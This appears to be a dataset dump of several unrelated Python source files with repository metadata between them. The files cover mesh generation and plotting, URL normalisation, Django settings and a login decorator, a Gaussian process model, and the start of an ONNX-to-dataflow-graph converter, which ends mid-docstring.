nodeDis=np.sqrt(temp_total)
if nodeDis<(sum(sidelength)/3.):
subDomain.append(tri1Domain)
subDomain.append(tri2Domain)
toBeFurtherMeshed.append(tri1Domain)
toBeFurtherMeshed.append(tri2Domain)
else:
subDomain.append(pinm.Node(tri1Domain.pos,norm=domain.normalVector))
subDomain.append(pinm.Node(tri2Domain.pos,norm=domain.normalVector))
domain.addNode(subDomain)
return toBeFurtherMeshed
def meshVolume(domain,boundaryDomainList,nodalDistribution,meshOuter=False): #nodalDistribution is a function with both i/o dictionary objects
if meshOuter:
meshOuterCoef=-1.
else:
meshOuterCoef=1.
NodeSpacing=nodalDistribution(domain.pos)
addNodeInstead=1
for coord in domain.maxDistance:
if domain.maxDistance[coord]>NodeSpacing[coord]:
addNodeInstead=0
centerPlane=[]
centerPlaneMidPoints=[]
for n in range(4):
centerPlane.append(multiplyDictionary(addDictionary([domain.vertices[n],domain.vertices[4+n]]),0.5))
for n in range(3):
centerPlaneMidPoints.append(multiplyDictionary(addDictionary([centerPlane[n],centerPlane[n+1]]),0.5))
centerPlaneMidPoints.append(multiplyDictionary(addDictionary([centerPlane[3],centerPlane[0]]),0.5))
planeCentroid=[]
midPoints=[]
for m in range(2):
midPoints.append([])
for n in range(3):
midPoints[m].append(multiplyDictionary(addDictionary([domain.vertices[m*4+n],domain.vertices[m*4+n+1]]),0.5))
midPoints[m].append(multiplyDictionary(addDictionary([domain.vertices[m*4+3],domain.vertices[m*4]]),0.5))
for m in range(2):
planeCentroid.append(multiplyDictionary(addDictionary([midPoints[m][0],midPoints[m][2]]),0.5))
subDomain=[]
toBeFurtherMeshed=[]
for m in range(2):
for n in range(4):
temp_subdomain=pinm.Domain('')
temp_vertices=[midPoints[m][n-1],domain.vertices[4*m+n],midPoints[m][n],planeCentroid[m],
centerPlaneMidPoints[n-1],centerPlane[n],centerPlaneMidPoints[n],domain.pos]
temp_subdomain.setCentroid(temp_vertices)
temp_boundaryNode=findNodes(temp_subdomain.pos,boundaryDomainList)
distancebetween={}
for coord in temp_boundaryNode.pos:
distancebetween[coord]=np.absolute(temp_boundaryNode.pos[coord]-temp_subdomain.pos[coord])
boundaryNodes=findNodes(temp_subdomain.pos,boundaryDomainList,distance=distancebetween)
innerNode=True
for boundaryNode in boundaryNodes:
boundaryNodeCentroid=boundaryNode.pos
boundaryNodeNorm=boundaryNode.norm
dotProduct=0.
normamplitude=0.
for coords in temp_subdomain.pos:
dotProduct+= (temp_subdomain.pos[coords]-boundaryNodeCentroid[coords])*boundaryNodeNorm[coords]
normamplitude+=boundaryNodeNorm[coords]**2.
dotProduct=dotProduct/np.sqrt(normamplitude)
for coords in temp_subdomain.maxDistance:
if (temp_subdomain.maxDistance[coords]*(1-addNodeInstead))<(meshOuterCoef*dotProduct):
innerNode=False
break
if innerNode==False:
break
if innerNode:
if addNodeInstead==1:
temp_node=pinm.Node(temp_subdomain.pos,norm=domain.normalVector)
subDomain.append(temp_node)
else:
toBeFurtherMeshed.append(temp_subdomain)
subDomain.append(temp_subdomain)
domain.addNode(subDomain)
return toBeFurtherMeshed;
def findNodes(position,domainList,distance=None,searchDepth=-1.):#assign search depth to -1 for nodes
temp_searchDepth=searchDepth
if distance==None:
findNearest=True
else:
findNearest=False
if findNearest:
referenceDomain=None
minDistanceSq=float("inf")
otherDomain=[]
for domain in domainList:
temp_distSq=0.
if bool(domain.pos):
for coords in position:
temp_distSq+=(position[coords]-domain.pos[coords])**2.
if minDistanceSq>temp_distSq:
minDistanceSq=temp_distSq
referenceDomain=domain
else:
for allDomain in domain.subDomain:
otherDomain.append(allDomain)
if len(otherDomain)!=0:
if type(referenceDomain) is pinm.Domain:
for includeDomain in referenceDomain.subDomain:
otherDomain.append(includeDomain)
elif type(referenceDomain) is pinm.Node:
otherDomain.append(referenceDomain)
nodes=findNodes(position,otherDomain,searchDepth=temp_searchDepth)
elif (type(referenceDomain) is not pinm.Node) and searchDepth!=0:
nodes=findNodes(position,referenceDomain.subDomain,searchDepth=(temp_searchDepth-1))
else:
nodes=referenceDomain
return nodes
else:
nodes=[]
for domain in domainList:
toAdd=True
if bool(domain.pos):
if type(domain) is not pinm.Node:
maxDistance=domain.maxDistance
else:
maxDistance={}
for coords in position:
maxDistance[coords]=0.
for coords in position:
if np.absolute(position[coords]-domain.pos[coords])>(maxDistance[coords]+distance[coords]):
toAdd=False
if toAdd:
if type(domain) is not pinm.Node:
for temp_nodes in findNodes(position,domain.subDomain,distance):
nodes.append(temp_nodes)
else:
nodes.append(domain)
return nodes
def addDictionary(a):
result={}
for dicts in a:
for key in dicts:
if key in result:
result[key]+=dicts[key]
else:
result[key]=dicts[key]
return result
def multiplyDictionary(a,b):
result={}
for key in a:
result[key]=a[key]*b
return result
def plotNodes(nodes,coordinate=['x','y','z'],variableIdentifier='',complex='real'):
figure = pyplot.figure()
axes = mplot3d.Axes3D(figure)
coordinateKey=[]
var=[]
numOfNodes=len(nodes)
coords=np.zeros((3,numOfNodes))
for n in range(numOfNodes):
for m in range(len(coords)):
coords[m][n]=nodes[n].pos[coordinate[m]]
if variableIdentifier!='':
if complex=='real':
var.append(nodes[n].variable[variableIdentifier].real)
elif complex=='imag':
var.append(nodes[n].variable[variableIdentifier].imag)
elif complex=='abs':
var.append(np.absolute(nodes[n].variable[variableIdentifier]))
if variableIdentifier!='':
cm = pyplot.get_cmap('jet')
cNorm = Colors.Normalize(vmin=min(var), vmax=max(var))
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cm)
axes.scatter(coords[0], coords[1], coords[2],c=scalarMap.to_rgba(var))
scalarMap.set_array(var)
figure.colorbar(scalarMap)
else:
axes.scatter(coords[0], coords[1], coords[2])
pyplot.show()
class DomainSelector:
def __init__(self,collectionList):
self.ind = 0
self.collectionList=collectionList
self.selectedIndex=[]
self.domainInfo=[]
self.domainCount=1
self.end=False
self.keyFunc={'l':self.nextFunc,
'k':self.prevFunc,
's':self.selectFunc,
'a':self.addToDomainFunc}
for n in collectionList:
self.selectedIndex.append(False)
self.domainInfo.append(0)
self.maxIndex=len(collectionList)-1
def next(self, event):
self.nextFunc()
def prev(self, event):
self.prevFunc()
def select(self, event):
self.selectFunc()
self.nextFunc()
def addToDomain(self, event):
self.addToDomainFunc()
def swapSelected(self, event):
self.swapSelectedFunc()
# def keyPressed(self,event):
# self.keyFunc[event.key]() #find code error
def nextFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('g')
else:
self.collectionList[self.ind].set_facecolor('b')
self.ind += 1
if self.ind>self.maxIndex:
self.ind = 0
while self.domainInfo[self.ind]!=0:
self.ind += 1
if self.ind>self.maxIndex:
self.ind = 0
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('r')
else:
self.collectionList[self.ind].set_facecolor('k')
pyplot.draw()
def prevFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('g')
else:
self.collectionList[self.ind].set_facecolor('b')
self.ind -= 1
if self.ind<0:
self.ind = self.maxIndex
while self.domainInfo[self.ind]!=0:
self.ind -= 1
if self.ind<0:
self.ind = self.maxIndex
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('r')
else:
self.collectionList[self.ind].set_facecolor('k')
pyplot.draw()
def selectFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('k')
self.selectedIndex[self.ind]=False
else:
self.collectionList[self.ind].set_facecolor('r')
self.selectedIndex[self.ind]=True
pyplot.draw()
def addToDomainFunc(self):
for n in range(len(self.selectedIndex)):
if self.selectedIndex[n]:
self.selectedIndex[n]=False
self.domainInfo[n]=self.domainCount
self.collectionList[n].set_facecolor('none')
self.domainCount +=1
self.end=True
for n in range(len(self.domainInfo)):
if self.domainInfo[n]==0:
self.ind = n
self.collectionList[self.ind].set_facecolor('k')
self.end=False
break
pyplot.draw()
def swapSelectedFunc(self):
for n in range(len(self.selectedIndex)):
if self.domainInfo[n]==0:
if self.selectedIndex[n]:
self.selectedIndex[n]=False
if n==self.ind:
self.collectionList[n].set_facecolor('k')
else:
self.collectionList[n].set_facecolor('b')
else:
self.selectedIndex[n]=True
if n==self.ind:
self.collectionList[n].set_facecolor('r')
else:
self.collectionList[n].set_facecolor('g')
pyplot.draw()
| 43.626917
| 189
| 0.619821
| 4,029
| 0.157328
| 0
| 0
| 0
| 0
| 0
| 0
| 1,045
| 0.040806
|
7735b7ce4419d727877113722c02541feac1a135
| 881
|
py
|
Python
|
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | null | null | null |
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | 1
|
2017-01-12T23:17:27.000Z
|
2017-01-12T23:17:27.000Z
|
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | 1
|
2016-10-31T23:19:15.000Z
|
2016-10-31T23:19:15.000Z
|
from urllib.parse import parse_qs, urlencode, urlparse
from .. import settings
def normalize(request, url: str) -> str:
parts = urlparse(url)
url = f"{settings.BASE_URL}{parts.path}"
if "background" in parts.query:
background = parse_qs(parts.query)["background"][0]
else:
background = ""
query = params(request, background=background)
if query:
url += "?" + urlencode(query)
return clean(url)
def params(request, **kwargs) -> dict:
return {k: v for k, v in kwargs.items() if v}
def clean(url: str) -> str:
url = _unquote_slashes(url)
url = _drop_trailing_spaces(url)
return url
def _unquote_slashes(url: str) -> str:
return url.replace("%3A%2F%2F", "://").replace("%2F", "/")
def _drop_trailing_spaces(url: str) -> str:
while "/_." in url:
url = url.replace("/_.", ".")
return url
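# Behaviour sketch (illustrative input): clean() unquotes percent-encoded
# slashes and collapses the '/_.' placeholder left by empty trailing segments.
#
#   clean("https://example.com/images/top%2Fbottom/_.png")
#   # -> "https://example.com/images/top/bottom.png"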
| 23.810811
| 62
| 0.61975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 100
| 0.113507
|
7736dad67e1bf0f9644b352cfa50dc3d03404717
| 211
|
py
|
Python
|
src/westpa/core/reweight/__init__.py
|
burntyellow/adelman_ci
|
cca251a51b34843faed0275cce01d7a307829993
|
[
"MIT"
] | 140
|
2015-01-07T23:30:36.000Z
|
2022-03-28T17:15:30.000Z
|
lib/west_tools/westpa/reweight/__init__.py
|
burntyellow/westpa
|
9dc62478fcef0001b9c038cd56a40b6be1b9d64a
|
[
"MIT"
] | 157
|
2015-01-03T03:38:36.000Z
|
2022-03-31T14:12:16.000Z
|
lib/west_tools/westpa/reweight/__init__.py
|
burntyellow/westpa
|
9dc62478fcef0001b9c038cd56a40b6be1b9d64a
|
[
"MIT"
] | 56
|
2015-01-02T21:21:40.000Z
|
2022-03-03T16:27:54.000Z
|
'''
Function(s) for the postanalysis toolkit
'''
import logging
log = logging.getLogger(__name__)
from . import _reweight
from ._reweight import (stats_process, reweight_for_c)
from .matrix import FluxMatrix
| 17.583333
| 54
| 0.781991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 48
| 0.227488
|
7738b7fae9ef9456645f45d2e182dbc304825ba1
| 1,573
|
py
|
Python
|
src/hydro/conf/settings_base.py
|
aolarchive/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 42
|
2015-03-04T09:05:00.000Z
|
2018-12-01T15:13:48.000Z
|
src/hydro/conf/settings_base.py
|
aolarchive/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 5
|
2015-05-11T08:18:12.000Z
|
2016-03-22T19:11:01.000Z
|
src/hydro/conf/settings_base.py
|
Convertro/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 4
|
2015-03-05T09:07:27.000Z
|
2018-12-01T15:13:49.000Z
|
# Hydro settings
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
APPLICATION_NAME = 'HYDRO'
SECRET_KEY = '8lu*6g0lg)9w!ba+a$edk)xx)x%rxgb$i1&022shmi1jcgihb*'
# SESSION_TIMEOUT is used in validate_session_active decorator to see if the
# session is active.
SECOND = 1
MINUTE = SECOND * 60
SECONDS_IN_DAY = SECOND*86400
MYSQL_CACHE_DB = 'cache'
MYSQL_STATS_DB = 'stats'
MYSQL_CACHE_TABLE = 'hydro_cache_table'
CACHE_IN_MEMORY_KEY_EXPIRE = 600
CACHE_DB_KEY_EXPIRE = 86400
USE_STATS_DB = False
DATABASES = {
'stats': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_STATS_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'cache': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_CACHE_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cache',
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
}
},
}
| 26.661017
| 113
| 0.591863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 856
| 0.544183
|
7738eed30266f468e9290a38da24497ebf1d541d
| 357
|
py
|
Python
|
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
from ...forms.checks import check_is_logged
from django.shortcuts import redirect
def no_login_required(view_function):
def exec_view_function(*args, **kwargs):
request = args[0]
if check_is_logged(request):
return redirect('/')
return view_function(*args, **kwargs)
return exec_view_function
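# Usage sketch (the view and template below are hypothetical, not part of this
# module): guard a login page so already-authenticated users are sent to '/'.
#
#   from django.shortcuts import render
#
#   @no_login_required
#   def login_view(request):
#       return render(request, 'login.html')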
| 23.8
| 47
| 0.661064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.008403
|
773934d535052c5583666741f88c9dfe16421a75
| 12,000
|
py
|
Python
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | 13
|
2021-12-03T19:24:11.000Z
|
2022-03-17T11:14:11.000Z
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | 1
|
2022-01-19T06:48:02.000Z
|
2022-01-19T06:48:02.000Z
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 DeepMind Technologies Limited.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian process model at discrete indices."""
from typing import Sequence, Union
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
tfk = tfp.math.psd_kernels
class DistributionWrapper(object):
"""Helper class for MVNormal model with mean and stddev methods."""
def __init__(self, mean, stddev):
self._mean = mean
self._stddev = stddev
def mean(self):
return self._mean
def stddev(self):
return self._stddev
class GaussianProcess(object):
"""Gaussian process model at discrete indices."""
def __init__(self,
num_indices: int,
kernel: tfk.PositiveSemidefiniteKernel,
offset: Union[float, tf.Tensor, tf.Variable],
variance: Union[float, tf.Tensor, tf.Variable]):
"""Creates a model for a stochastic process.
Args:
num_indices: integer, the number of discrete indices.
kernel: An instance of
`tfp.positive_semidefinite_kernels.PositiveSemidefiniteKernels`. The
type of the kernel will be used to cast the inputs and outputs of the
model.
offset: Scalar, offset the observations by this amount.
variance: variance of the Gaussian observation noise.
"""
self._n_xs = num_indices
self._kernel = kernel
self._offset = offset
self._dtype = kernel.dtype
self._variance = variance
# self._xs is not supposed to change and is treated as constants.
self._xs = tf.range(self.n_xs, dtype=self._dtype)[:, None]
# These values will be updated and are treated as variables.
self._ys_num = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
self._ys_mean = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
self._ys_sq_mean = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
def add(self, xs, ys):
"""Adds a batch of observations to the model.
Args:
xs: An array (or equivalent) of shape `[B, input_dim]`, where `B` is an
arbitrary batch dimension, and `input_dim` must be compatible with
the trailing dimension of the already fed in observations (if any).
ys: An array (or equivalent) of shape `[B]` or `[B, 1]`,
where `B` is an arbitrary batch dimension.
"""
xs = np.asarray(xs, self._dtype)
ys = np.asarray(ys, self._dtype)
if ys.ndim > 2 or (ys.ndim == 2 and ys.shape[1] > 1):
raise ValueError('ys must have a shape of [B] or [B, 1]')
ys = ys.ravel()
ys_num = self._ys_num.numpy()
ys_mean = self._ys_mean.numpy()
ys_sq_mean = self._ys_sq_mean.numpy()
for x, y in zip(xs, ys):
i = int(x[0])
ys_num[i] += 1.
ys_mean[i] += (y - ys_mean[i]) / ys_num[i]
ys_sq_mean[i] += (y ** 2 - ys_sq_mean[i]) / ys_num[i]
self._ys_num.assign(ys_num)
self._ys_mean.assign(ys_mean)
self._ys_sq_mean.assign(ys_sq_mean)
def index(self, index_points, latent_function: bool = False):
"""Compute the marginal posterior distribution at the given `index_points`.
Args:
index_points: A Tensor (or equivalent) of shape `[B, input_dim]`, where
`B` is an arbitrary batch dimension, and `input_dim` must be compatible
with the trailing dimension of the already fed in observations (if any).
latent_function: If True, return the distribution of the latent
function value at index points without observation noise. Otherwise,
return the distribution of noisy observations.
Returns:
An object with mean and stddev methods.
"""
_, post_mean, post_var = self._marginal_and_posterior()
index_points = tf.squeeze(tf.cast(index_points, tf.int32), axis=1)
post_mean = tf.gather(post_mean, index_points)
post_var = tf.gather(post_var, index_points)
if not latent_function:
post_var += self._variance
return DistributionWrapper(post_mean, tf.sqrt(post_var))
def loss(self):
"""The negative log probability of the observations under the GP."""
log_marg, _, _ = self._marginal_and_posterior(margin_only=True)
return -log_marg
@property
def n_xs(self):
"""Returns the number of unique indices."""
return self._n_xs
@property
def n_observations(self):
"""Returns the number of observations used by the model."""
return tf.reduce_sum(self._ys_num)
def _merge_observations(self):
"""Merge observations at the same index into a single observation."""
# Observations.
ys_mean = self._ys_mean - self._offset
ys_var = self._variance # Scalar.
ys_s = self._ys_sq_mean - tf.square(self._ys_mean) # Empirical variance.
# Filter indices without observations.
index_mask = tf.greater(self._ys_num, 0)
xs = tf.boolean_mask(self._xs, index_mask)
n_xs = tf.cast(tf.shape(xs)[0], self._dtype)
ys_mean = tf.boolean_mask(ys_mean, index_mask)
ys_s = tf.boolean_mask(ys_s, index_mask)
ys_num = tf.boolean_mask(self._ys_num, index_mask)
o_mean = ys_mean
o_var = ys_var / ys_num
# Additional likelihood term inside exp(-1/2(.)).
extra_term = -0.5 * tf.reduce_sum(ys_num / ys_var * ys_s)
# Additional likelihood term of 1/\sqrt(2\pi * var)
extra_term += -0.5 * (
tf.math.log(2.0 * np.pi) * (self.n_observations - n_xs)
+ tf.math.log(ys_var) * self.n_observations
- tf.reduce_sum(tf.math.log(o_var)))
return index_mask, xs, o_mean, o_var, extra_term
@tf.function
def _marginal_and_posterior(self, margin_only=False):
"""Compute marginal log-likelihood and posterior mean and variance."""
index_mask, xs, o_mean, o_var, extra_term = self._merge_observations()
n_xs = tf.cast(tf.shape(xs)[0], self._dtype)
log_marg = extra_term - 0.5 * tf.math.log(2.0 * np.pi) * n_xs
# K + sigma2*I or K + Sigma (with Sigma diagonal) matrix
# where X are training or inducing inputs
k_x_all = self._kernel.matrix(xs, self._xs)
k_xx = tf.boolean_mask(k_x_all, index_mask, axis=1)
k = k_xx + tf.linalg.diag(o_var)
chol = tf.linalg.cholesky(k)
# L^{-1} \mu
a = tf.linalg.triangular_solve(chol, tf.expand_dims(o_mean, 1), lower=True)
log_marg += (
-tf.reduce_sum(tf.math.log(tf.linalg.diag_part(chol)))
- 0.5 * tf.reduce_sum(tf.square(a)))
log_marg = tf.reshape(log_marg, [-1])
if margin_only:
return (log_marg,
tf.zeros((), dtype=self._dtype),
tf.zeros((), dtype=self._dtype))
# predict at the training inputs X
a2 = tf.linalg.triangular_solve(chol, k_x_all, lower=True)
# posterior variance
k_all_diag = self._kernel.apply(self._xs, self._xs)
post_var = k_all_diag - tf.reduce_sum(tf.square(a2), 0)
# posterior mean
post_mean = tf.squeeze(tf.matmul(a2, a, transpose_a=True), axis=1)
post_mean = post_mean + self._offset
return log_marg, post_mean, post_var
def sample(self):
"""Compute marginal log-likelihood and posterior mean and variance."""
index_mask, _, o_mean, o_var, _ = self._merge_observations()
# K + sigma2*I or K + Sigma (with Sigma diagonal) matrix
# where X are training or inducing inputs
k_all_all = self._kernel.matrix(self._xs, self._xs)
k_x_all = tf.boolean_mask(k_all_all, index_mask)
k_xx = tf.boolean_mask(k_x_all, index_mask, axis=1)
k = k_xx + tf.linalg.diag(o_var)
chol = tf.linalg.cholesky(k)
# L^{-1} \mu
a = tf.linalg.triangular_solve(chol, tf.expand_dims(o_mean, 1), lower=True)
# predict at the training inputs X
a2 = tf.linalg.triangular_solve(chol, k_x_all, lower=True)
# posterior mean
post_mean = tf.squeeze(tf.matmul(a2, a, transpose_a=True), axis=1)
post_mean = post_mean + self._offset
# full posterior covariance matrix.
post_var = k_all_all - tf.matmul(a2, a2, transpose_a=True)
mvn = tfd.MultivariateNormalTriL(
loc=post_mean, scale_tril=tf.linalg.cholesky(post_var))
return mvn.sample()
class GaussianProcessWithSideObs(GaussianProcess):
"""Gaussian process model at discrete indices and side observations."""
def __init__(self,
num_indices: int,
kernel: tfk.PositiveSemidefiniteKernel,
offset: Union[float, tf.Tensor, tf.Variable],
variance: Union[float, tf.Tensor, tf.Variable],
side_observations: Sequence[Sequence[float]],
side_observations_variance: Union[float, Sequence[float],
Sequence[Sequence[float]],
tf.Tensor, tf.Variable]):
"""Creates a model for a stochastic process.
Args:
num_indices: integer, the number of discrete indices.
kernel: An instance of
`tfp.positive_semidefinite_kernels.PositiveSemidefiniteKernels`. The
type of the kernel will be used to cast the inputs and outputs of the
model.
offset: Scalar, offset the observations by this amount.
variance: variance of the Gaussian observation noise.
side_observations: [num_side_observation_per_index, num_indices] array of
side observations.
side_observations_variance: side observation variances of the same shape
as side_observations or can be broadcast to the same shape.
"""
super().__init__(num_indices=num_indices,
kernel=kernel,
offset=offset,
variance=variance)
self._zs_var = side_observations_variance
# self._zs is not supposed to change and is treated as constants.
self._zs = tf.constant(side_observations, dtype=self._dtype)
if self._zs.ndim != 2:
raise ValueError('Side observation dimension must be 2.')
if self._zs.shape[1] != num_indices:
raise ValueError('Side observation dimension does not match num_indices.')
def _merge_observations(self):
"""Merge observations and side observations at the same index."""
# Observations.
ys_mean = self._ys_mean - self._offset
ys_var = self._variance # Scalar.
ys_s = self._ys_sq_mean - tf.square(self._ys_mean) # Empirical variance.
# Side observations.
zs = self._zs - self._offset
# Broadcast zs_var to have the same shape as zs.
zs_var = self._zs_var + tf.zeros_like(zs)
o_var = 1. / (tf.reduce_sum(1. / zs_var, axis=0) + self._ys_num / ys_var)
o_mean = (tf.reduce_sum(zs / zs_var, axis=0)
+ self._ys_num / ys_var * ys_mean) * o_var
# Additional likelihood term inside exp(-1/2(.)).
extra_term = -0.5 * tf.reduce_sum(
tf.reduce_sum(tf.square(zs) / zs_var, axis=0)
+ self._ys_num / ys_var * tf.square(ys_mean)
- tf.square(o_mean) / o_var
+ self._ys_num / ys_var * ys_s)
# Additional likelihood term of 1/\sqrt(2\pi * var)
extra_term += -0.5 * (
tf.math.log(2.0 * np.pi) * (
self.n_observations + (zs.shape[0] - 1) * zs.shape[1])
+ tf.reduce_sum(tf.math.log(zs_var))
+ tf.math.log(ys_var) * self.n_observations
- tf.reduce_sum(tf.math.log(o_var)))
# All the indices are returned due to the side observation.
index_mask = tf.ones(self._xs.shape[0], dtype=tf.bool)
xs = self._xs
return index_mask, xs, o_mean, o_var, extra_term
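# Minimal usage sketch (not part of the original module); the kernel choice and
# every numeric value below are illustrative assumptions.
#
#   kernel = tfk.ExponentiatedQuadratic(amplitude=1.0, length_scale=2.0)
#   gp = GaussianProcess(num_indices=5, kernel=kernel, offset=0.0, variance=0.1)
#   gp.add(xs=[[0], [0], [3]], ys=[1.2, 0.8, -0.5])  # two draws at index 0, one at 3
#   posterior = gp.index([[1], [4]])                 # marginal posterior at indices 1 and 4
#   posterior.mean(), posterior.stddev()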
| 37.974684
| 80
| 0.66375
| 11,182
| 0.931833
| 0
| 0
| 1,680
| 0.14
| 0
| 0
| 4,553
| 0.379417
|
7739a64f5308987b56c062ce417f754ae7cdc0bb
| 13,476
|
py
|
Python
|
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
from collections import defaultdict
from pathlib import Path
from typing import Dict, Iterable, List, Optional, Tuple, Union
import networkx as nx
import onnx
from . import graph_ir as g
from .onnx_attr import get_node_shape, node_attr_to_dict, node_to_shape
PathLike = Union[str, Path]
GraphT = onnx.GraphProto
NodeT = onnx.NodeProto
NodeT.__hash__ = lambda self: id(self)
NodeT.__repr__ = NodeT.__str__ = lambda self: self.name
class MarkedSubGraph:
"""A subgraph with information on how it should replace a node in a super graph.
subgraph: a nx.DiGraph subgraph
entry_edges: a list of edges from nodes "outside" to nodes in self.subgraph
exit: the exit node of the subgraph.
When this subgraph replaces a node `n`, self.exit will be connected to
    whatever `n` is connected to.
"""
def __init__(self, subgraph: nx.DiGraph, entry_edges, exit) -> None:
assert all(to in subgraph for _, to, _ in entry_edges)
assert exit in subgraph
self.subgraph, self.exit = subgraph, exit
self.entry_edges = [(f, t, {"index": i}) for f, t, i in entry_edges]
@classmethod
def idiomatic_1to2(cls, node1, node2, predecessors):
"""Create an idiomatic replacement as follow:
node(arg1, arg2, arg3) -> node2(node1(arg1, arg2), arg3)"""
p0, p1, p2 = predecessors
graph = nx.DiGraph()
graph.add_edge(node1, node2, index=0)
return cls(graph, [(p0, node1, 0), (p1, node1, 1), (p2, node2, 1)], node2)
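    # Illustrative example: `_emit_node` below splits a Conv node that carries a
    # bias input into Conv2DNode followed by BiasAddNode via
    #   MarkedSubGraph.idiomatic_1to2(conv_node, bias_node, [input, weights, bias])
    # which wires (input -> conv, arg 0), (weights -> conv, arg 1),
    # (bias -> bias_add, arg 1) and marks the BiasAddNode as the exit node.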
EmitNodeT = Union[MarkedSubGraph, g.DFGNode]
class DFG(object):
"""ONNX model translated into DFG with `DFGNode`s.
    This class has a DFG, input/output information, and a clear traversal order
    (think dominator tree), and is easier for CodeGen classes to work with."""
def __init__(self, graph: GraphT):
self._check_model(graph)
self._var_count = 0
# Build explicit DFG with ONNX nodes
onnx_graph = self._build_onnx_dfg(graph)
# Convert ONNX dfg into DFGNode DFG
self.graph = self._build_dfg(onnx_graph)
# Find out input nodes and output node (unique)
# removing dead nodes along the way if any
self.inputs, self.output = self._dce_get_io_info()
################ Interfaces:
@property
def traverse_order(self) -> List[g.DFGNode]:
"""Get topological order of computational graph by use-def relation."""
return list(nx.topological_sort(self.graph))
def node_args(self, node: g.DFGNode):
"""Get input arguments of node."""
sorted_edges = sorted(self.graph.in_edges(node, "index"), key=lambda p: p[2])
return [e[0] for e in sorted_edges]
def dump_weights(self, output_dir: PathLike) -> None:
"""Dump `WeightTensor`s into output_dir."""
output_dir = Path(output_dir)
for node in self.graph.nodes:
if not isinstance(node, g.WeightTensor):
continue
node.dump_weight(output_dir / (node.new_name + "_path.bin"))
################ Internal methods (high-level):
@staticmethod
def _check_model(onnx_graph: GraphT):
"""Check model validaty and single output (which is our limitation)"""
import warnings
from onnx import checker, onnx_cpp2py_export
# try use onnx's own model checker before converting any model
try:
checker.check_graph(onnx_graph)
except onnx_cpp2py_export.checker.ValidationError as e:
warnings.warn(str(e))
        if any(len(n.output) > 1 for n in onnx_graph.node):
            raise ValueError("All nodes must have a single output")
        if len(onnx_graph.output) > 1:
            raise ValueError("Graph must have a single output")
@staticmethod
def _build_onnx_dfg(graph: GraphT) -> nx.DiGraph:
"""Creates a DiGraph (by use-def relation) of onnx nodes from onnx GraphProto.
